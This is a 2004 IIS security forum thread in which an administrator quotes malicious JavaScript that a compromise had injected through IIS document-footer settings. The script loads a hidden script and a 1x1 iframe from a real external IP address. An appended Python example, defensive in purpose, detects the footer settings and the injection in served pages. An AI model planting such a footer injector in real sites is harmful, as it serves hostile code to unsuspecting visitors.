IIS Server Security - Russian IIS hack? Malicious Javascript code


Subject: Russian IIS hack? Malicious Javascript code
Author: Marc Krueger
Posted: 2004-06-26, 10:16 am


>-----Original Message-----
>I successfully removed some malicious code from my IIS 5.0 server that
>may not have had all its patches updated, but I cannot find any
>information on this malicious code, which redirected the users of my
>websites on a random basis to a Russian website that appeared to be
>down, a domain called balamut.com with an IP address of
>217.107.218.147, which RDNS to unassigned.m10-msk-ru.e-neverland.net.
>
>The JavaScript code lived in some fake .dll files in the inetsrv
>folder. One fake .dll file was created for each web on my server, and
>in the IIS metabase the DefaultDocFooter was set to each of the .dll
>files and EnableDocFooter was set to true.
>
>The offending code was embedded in every file that the website
>delivered, and on pages that had embedded .js files the JavaScript for
>those pages would not function.
>
>I have posted the offending code; maybe someone can identify this?
>
>As proof, check out a Google search for one of the functions in the
>code, okx12(). You'll see the first link it returns is an RTF; if you
>view the HTML version you'll see this code appended to the bottom of
>the page.
>
><script language="JavaScript"><!--
>var qxco7=document.cookie;
>function gc099(n21){
>  var ix=qxco7.indexOf(n21+"=");
>  if(ix==-1)return null;
>  ix=qxco7.indexOf("=",ix)+1;
>  var es=qxco7.indexOf(";",ix);
>  if(es==-1)es=qxco7.length;
>  return unescape(qxco7.substring(ix,es));
>}
>function sc088(n24,v8){
>  var today=new Date();
>  var expiry=new Date(today.getTime()+600000);
>  if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();
>  qxco7=document.cookie;
>}
>function okx12(){window.status="";setTimeout("okx12()",200);}
>okx12();
>if(location.href.indexOf("https")!=0){
>  if(gc099("trk716")==null){
>    document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
>    sc088("trk716","4");
>  }
>}
>// --></script>
>


Experienced the same issue. Found and deleted the .dll files and modified
the footer setting, and it seemed to resolve this issue. Still backtracking
the logs to see how this happened, as the server was patched and behind a
firewall. This is a weird one, as it did not affect our OWA server, which is
set up basically the same way.
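Both posters found the injection the same way: a document footer enabled in the IIS metabase, pointing at a fake .dll under inetsrv, with the resulting script appended to every response. The following is an added example, not code from either poster, that turns those two observations into checks. The first function audits a mapping of metabase paths to their EnableDocFooter/DefaultDocFooter values (you would collect that mapping from the metabase yourself, for example with adsutil.vbs or the IIS ADSI provider; the "FILE:"/"STRING:" prefix convention on DefaultDocFooter and the "/LM/W3SVC/n/ROOT" path form are assumed here). The second scans HTML response bodies for generic forms of what the posted script does. The settings table, the sample page and the host 192.0.2.10 are constructed for the example and are not the thread's values.

```python
import re
from typing import Dict, List, Tuple

# --- Part 1: audit IIS document-footer settings -----------------------------
# Input is a mapping of metabase path -> properties, as collected from the
# metabase (e.g. via adsutil.vbs or the IIS ADSI provider). The "FILE:" /
# "STRING:" prefix on DefaultDocFooter is an assumption of this example.
FooterSettings = Dict[str, Dict[str, object]]

# Constructed sample: site 1 mirrors the thread's symptom (footer pointing at a
# fake .dll under inetsrv), site 2 has footers off, site 3 has a benign footer.
SAMPLE_SETTINGS: FooterSettings = {
    "/LM/W3SVC/1/ROOT": {"EnableDocFooter": True,
                         "DefaultDocFooter": r"FILE:C:\WINNT\system32\inetsrv\web1.dll"},
    "/LM/W3SVC/2/ROOT": {"EnableDocFooter": False, "DefaultDocFooter": ""},
    "/LM/W3SVC/3/ROOT": {"EnableDocFooter": True,
                         "DefaultDocFooter": r"FILE:D:\sites\legal\footer.htm"},
}


def audit_footer_settings(settings: FooterSettings) -> List[Tuple[str, str, str]]:
    """Return (metabase path, severity, detail) for every path with footers enabled.

    A footer file under inetsrv or with a .dll extension is rated "high" (the
    pattern described in the thread); any other enabled footer is "review".
    """
    findings = []
    for path, props in settings.items():
        if not props.get("EnableDocFooter"):
            continue
        footer = str(props.get("DefaultDocFooter", ""))
        kind, _, value = footer.partition(":")
        low = value.lower()
        if kind.upper() == "FILE" and (low.endswith(".dll") or "\\inetsrv\\" in low):
            findings.append((path, "high", "footer file under inetsrv or with .dll extension: " + value))
        else:
            findings.append((path, "review", "document footer enabled: " + footer))
    return findings


# --- Part 2: spot an injected footer in served pages -------------------------
# Indicators are generic forms of what the posted script does: a <script> and a
# 1x1 <iframe> loaded from a bare IP address, a loop that blanks window.status,
# and markup after </html> (a document footer is appended to the response, so
# non-whitespace content after </html> is unusual on a normal page).
_IP_URL = r'https?://\d{1,3}(?:\.\d{1,3}){3}/'
INDICATORS = {
    "script_src_bare_ip": re.compile(r'<script[^>]+src=\\?"' + _IP_URL, re.I),
    "iframe_src_bare_ip": re.compile(r'<iframe[^>]+src=\\?"' + _IP_URL, re.I),
    "hidden_1x1_iframe": re.compile(r'<iframe[^>]*\bheight=\\?"1\\?"[^>]*\bwidth=\\?"1\\?"', re.I),
    "status_bar_suppression": re.compile(r'window\.status\s*=\s*""\s*;\s*setTimeout', re.I),
    "content_after_html_close": re.compile(r'</html>\s*\S', re.I),
}


def scan_body(body: str) -> List[str]:
    """Return the names of all indicators found in one HTML response body."""
    return [name for name, rx in INDICATORS.items() if rx.search(body)]


# Constructed sample page with a footer modelled on the posted script; the host
# 192.0.2.10 is a documentation-range placeholder, not the thread's IP.
SAMPLE_INJECTED = r'''<html><body><p>Hello</p></body></html>
<script language="JavaScript"><!--
function okx12(){window.status="";setTimeout("okx12()",200);}okx12();
document.write("<script language=\"JavaScript\" src=\"http://192.0.2.10/dot.php\"></script><iframe src=\"http://192.0.2.10/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
// --></script>
'''
SAMPLE_CLEAN = "<html><body><p>Hello</p></body></html>\n"

if __name__ == "__main__":
    for finding in audit_footer_settings(SAMPLE_SETTINGS):
        print("metabase:", *finding)
    print("injected page:", scan_body(SAMPLE_INJECTED))
    print("clean page:", scan_body(SAMPLE_CLEAN))
```

The body scan is meant to run over responses fetched from the server (or over saved pages), not over the files on disk: the footer is added by IIS at delivery time, which is why the first poster saw it in every page the site served while the site's own files looked untouched.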
Copyright 2003 - 2008 webservertalk.com